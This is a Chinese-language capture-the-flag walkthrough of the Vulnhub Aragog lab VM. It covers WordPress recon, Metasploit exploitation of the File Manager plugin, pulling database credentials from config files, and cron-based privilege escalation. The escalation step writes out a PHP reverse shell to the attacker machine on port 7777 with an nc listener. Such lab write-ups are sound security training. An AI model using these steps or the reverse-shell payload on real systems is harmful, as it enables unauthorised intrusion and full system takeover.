【Vulnhub】之Aragog-1.0.2

一、 部署方法

1. 在官网上下载靶机ova环境：https://download.vulnhub.com/harrypotter/Aragog-1.0.2.ova
2. 使用VMware搭建靶机环境
3. 攻击机使用VMware上搭建的kali
4. 靶机和攻击机之间使用NAT模式，保证靶机和攻击机放置于同一网段中。

二、 靶机下载安装

靶机下载与安装参考之前文章：搭建Vulnhub靶机详细步骤

三、渗透测试

1. 信息收集

arp-scan -l

扫描网段信息

发现靶机IP：192.168.15.135

使用 nmap 对靶机IP进行深度扫描

nmap -A -T4 -p- 192.168.15.135

nmap扫描发现靶机对外开放了22和80端口，浏览器去访问下web服务

发现只有一张图片，再使用 dirsearch 尝试扫描下网站目录

dirsearch -u 192.168.15.135

浏览器访问下扫描出来可访问的网站目录

点击Blog发现跳转到了wordpress.aragog.hogwarts

我们在hosts文件中添加域名解析：192.168.15.135 wordpress.aragog.hogwarts

vi /etc/hosts

保存退出后，重新载入发现可以正常访问到页面

浏览了下页面，发现没有可利用的点，但是我们能发现这个站点是利用wordpress搭建的

接下来我们使用wpscan枚举一下（ps：wpscan是一个扫描WordPress漏洞的扫描器）

去注册个免费的账号获取api-token：https://wpscan.com/（需要翻墙，否则无法注册）

wpscan --api-token=获取到的免费api-token --url=http://192.168.15.135/blog -e p --plugins-detection aggressive

扫描到3个File Manager的漏洞

2. 漏洞利用

使用msf进行漏洞利用

msfconsole                       #启动msf
search file manager wordpress    #查找漏洞相关exp
use 1                            #使用第1个exp
show options                     #查看需要设置的参数
set RHOSTS 192.168.15.135        #设置靶机IP
set TARGETURI /blog              #设置路径
set LHOST 192.168.15.131         #设置攻击IP
run                              #启动攻击

成功获取到shell

3. 提权

为方便操作，首先使用python打开交互式

python3 -c 'import pty;pty.spawn("/bin/bash")'

wordpress搭建的网站数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件里，查看后发现了数据库的root密码

使用root密码连接数据库，我们在wordpress数据库下，wp_users表中查到一条登录记录

mysql -u root -p         #连接数据库
show databases;          #查看所有数据库
use wordpress；          #使用wordpress数据库
show tables；            #查看wordpress数据库中所有表
select * from wp_users;  #查看wp_users表内容

解密后我们得到了hagrid98账户的密码：password123

尝试ssh登录

ssh hagrid98@192.168.15.135

成功登录，并在当前目录下发现了第一个魂器

继续查看目录文件，我们在/opt目录下发现一个隐藏的脚本文件：.backup.sh

查看脚本文件内容是将上传的文件复制到tmp目录里，应该是定时执行

所以我们到目录/tmp下写一个反弹shell的php脚本，然后修改.backup.sh脚本内容

<?php $sock=fsockopen("192.168.15.131",7777);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

在kali中开启7777端口监听

nc -lnvp 7777

等待片刻，成功获取到root权限，并在root目录下发现了第二个魂器

完！